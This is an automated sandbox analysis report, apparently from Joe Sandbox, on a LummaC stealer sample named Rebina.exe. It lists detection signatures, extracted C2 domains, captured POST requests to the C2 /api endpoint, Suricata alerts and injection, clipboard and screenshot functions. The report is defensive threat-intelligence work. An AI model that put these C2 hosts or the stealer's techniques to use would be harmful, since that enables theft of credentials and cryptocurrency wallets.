Edit tour

Windows Analysis Report
Rebina.exe

Overview

General Information

Sample name:	Rebina.exe
Analysis ID:	1500380
MD5:	30cbc399e37eef662eaeb7d90148f013
SHA1:	349839e58f61a81512d2545bd70ca0d0d7baa549
SHA256:	bfde2ff885475fc1212ff255cc5f4e17b0ede10a8ee21b7b83cd34fc0ad73a03
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Rebina.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Rebina.exe" MD5: 30CBC399E37EEF662EAEB7D90148F013)

conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2672 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 2104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 1624 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["locatedblsoqp.shop", "traineiwnqo.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "millyscroqwp.shop", "condedqpwqm.shop", "assumptionflattyou.shop", "stagedchheiqwo.shop", "evoliutwoqm.shop"], "Build id": "HpOoIh--@Ken0zz"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer Related Activity M2 - Source IP: 192.168.2.5 - Destination IP: 104.21.66.182

Timestamp:	2024-08-28T11:17:02.186665+0200
SID:	2049812
Severity:	1
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 104.21.66.182

Timestamp:	2024-08-28T11:17:02.186665+0200
SID:	2054653
Severity:	1
Source Port:	49705
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer Related Activity - Source IP: 192.168.2.5 - Destination IP: 104.21.66.182

Timestamp:	2024-08-28T11:17:01.289610+0200
SID:	2049836
Severity:	1
Source Port:	49704
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 104.21.66.182

Timestamp:	2024-08-28T11:17:01.289610+0200
SID:	2054653
Severity:	1
Source Port:	49704
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Rebina.exe

Avira: detected

Antivirus detection for URL or domain

Source: condedqpwqm.shop	Avira URL Cloud: Label: phishing
Source: https://assumptionflattyou.shop/api	Avira URL Cloud: Label: phishing
Source: stamppreewntnq.shop	Avira URL Cloud: Label: phishing
Source: assumptionflattyou.shop	Avira URL Cloud: Label: phishing
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop	Avira URL Cloud: Label: phishing
Source: https://assumptionflattyou.shop/	Avira URL Cloud: Label: phishing
Source: https://assumptionflattyou.shop/api:	Avira URL Cloud: Label: phishing
Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: https://assumptionflattyou.shop/pic	Avira URL Cloud: Label: phishing
Source: stagedchheiqwo.shop	Avira URL Cloud: Label: phishing
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 4.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["locatedblsoqp.shop", "traineiwnqo.shop", "caffegclasiqwp.shop", "stamppreewntnq.shop", "millyscroqwp.shop", "condedqpwqm.shop", "assumptionflattyou.shop", "stagedchheiqwo.shop", "evoliutwoqm.shop"], "Build id": "HpOoIh--@Ken0zz"}

Multi AV Scanner detection for domain / URL

Source: assumptionflattyou.shop	Virustotal: Detection: 15%	Perma Link
Source: https://assumptionflattyou.shop/api	Virustotal: Detection: 13%	Perma Link
Source: assumptionflattyou.shop	Virustotal: Detection: 15%	Perma Link
Source: stamppreewntnq.shop	Virustotal: Detection: 17%	Perma Link
Source: condedqpwqm.shop	Virustotal: Detection: 17%	Perma Link
Source: evoliutwoqm.shop	Virustotal: Detection: 6%	Perma Link
Source: locatedblsoqp.shop	Virustotal: Detection: 17%	Perma Link
Source: https://assumptionflattyou.shop/	Virustotal: Detection: 15%	Perma Link
Source: millyscroqwp.shop	Virustotal: Detection: 21%	Perma Link
Source: stagedchheiqwo.shop	Virustotal: Detection: 17%	Perma Link
Source: caffegclasiqwp.shop	Virustotal: Detection: 20%	Perma Link
Source: traineiwnqo.shop	Virustotal: Detection: 20%	Perma Link
Source: https://assumptionflattyou.shop/api:	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for submitted file

Source: Rebina.exe

Virustotal: Detection: 60%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: caffegclasiqwp.shop
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stamppreewntnq.shop
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: stagedchheiqwo.shop
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: millyscroqwp.shop
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: evoliutwoqm.shop
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: condedqpwqm.shop
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: traineiwnqo.shop
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: locatedblsoqp.shop
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: assumptionflattyou.shop
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 4.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: HpOoIh--@Ken0zz

Source: Rebina.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.66.182:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.182:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: Rebina.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\388fm14yqlq\obj\Release\doX.pdb source: Rebina.exe
Source:	Binary string: c:\388fm14yqlq\obj\Release\doX.pdbP source: Rebina.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	4_2_00435076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	4_2_004358F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	4_2_00435C11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	4_2_0040BD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	4_2_00438860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h	4_2_0041F871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movsx ebx, byte ptr [ecx]	4_2_00437022
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]	4_2_00430090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, 00008000h	4_2_004040A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_00421140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h	4_2_0041F942
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ecx+01h], 00000000h	4_2_00414967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ecx+01h], 00000000h	4_2_00414967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_00414967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_0042B110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	4_2_00413130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000A0h]	4_2_00411138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp+78h], 00000000h	4_2_004119CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	4_2_004119EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_0040E9AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	4_2_0040A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	4_2_00432210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	4_2_00435AFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	4_2_0041AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 84AA3BD1h	4_2_00438280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	4_2_00436280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h	4_2_0041FAA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 44CAAEB6h	4_2_0041A2B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 0960C135h	4_2_0041A2B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_00414355
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi], 00000000h	4_2_0040EB2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	4_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], bl	4_2_00401BF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	4_2_0041F38A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h	4_2_0041FB8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-10h]	4_2_0041EBB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, eax	4_2_00406C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	4_2_00435CCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_00437D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	4_2_00419500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_0041CD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000001C4h]	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000810h]	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000564h]	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+34h]	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+18h]	4_2_004245D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	4_2_0041EDF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], bl	4_2_00401E57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [esi], bl	4_2_00401E3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0960C135h	4_2_00419F16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	4_2_00421730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00419780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-14h]	4_2_0041DF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h	4_2_0041DF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	4_2_0041DF97

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.66.182:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.66.182:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.66.182:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.182:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: assumptionflattyou.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: assumptionflattyou.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=UItWLPb.jffFkQHYxCXahyQUyV48gMmu7BqJwD1OjBo-1724836621-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: assumptionflattyou.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: assumptionflattyou.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: assumptionflattyou.shop

Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000004.00000002.2248451370.000000000105A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/
Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2248451370.000000000102A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/api
Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/api:
Source: RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/pic

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.21.66.182:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.182:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0042AED0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_0042AED0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0042AED0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_0042AED0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_004228D5 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

4_2_004228D5

System Summary

.NET source code contains very large array initializations

Source: Rebina.exe, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 282112

Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E10988	0_2_00E10988
Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E10987	0_2_00E10987
Source: C:\Users\user\Desktop\Rebina.exe	Code function: 0_2_00E10C1B	0_2_00E10C1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040A800	4_2_0040A800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004358F0	4_2_004358F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040BD10	4_2_0040BD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00438860	4_2_00438860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00437022	4_2_00437022
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00407830	4_2_00407830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041D030	4_2_0041D030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040008E	4_2_0040008E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041D890	4_2_0041D890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004040A0	4_2_004040A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040C95D	4_2_0040C95D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00407160	4_2_00407160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414967	4_2_00414967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00416100	4_2_00416100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0042F930	4_2_0042F930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004119EF	4_2_004119EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040E9AD	4_2_0040E9AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004369B0	4_2_004369B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00404AF0	4_2_00404AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041AA80	4_2_0041AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00438280	4_2_00438280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041A2B4	4_2_0041A2B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414355	4_2_00414355
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00436B73	4_2_00436B73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00436B00	4_2_00436B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040EB2D	4_2_0040EB2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041F38A	4_2_0041F38A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041C390	4_2_0041C390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040245A	4_2_0040245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040247C	4_2_0040247C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00406C10	4_2_00406C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00407CC0	4_2_00407CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004304D0	4_2_004304D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00403CE0	4_2_00403CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00405490	4_2_00405490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004024A9	4_2_004024A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00436CB0	4_2_00436CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040B560	4_2_0040B560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00438570	4_2_00438570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00402520	4_2_00402520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041FD20	4_2_0041FD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00436DC0	4_2_00436DC0
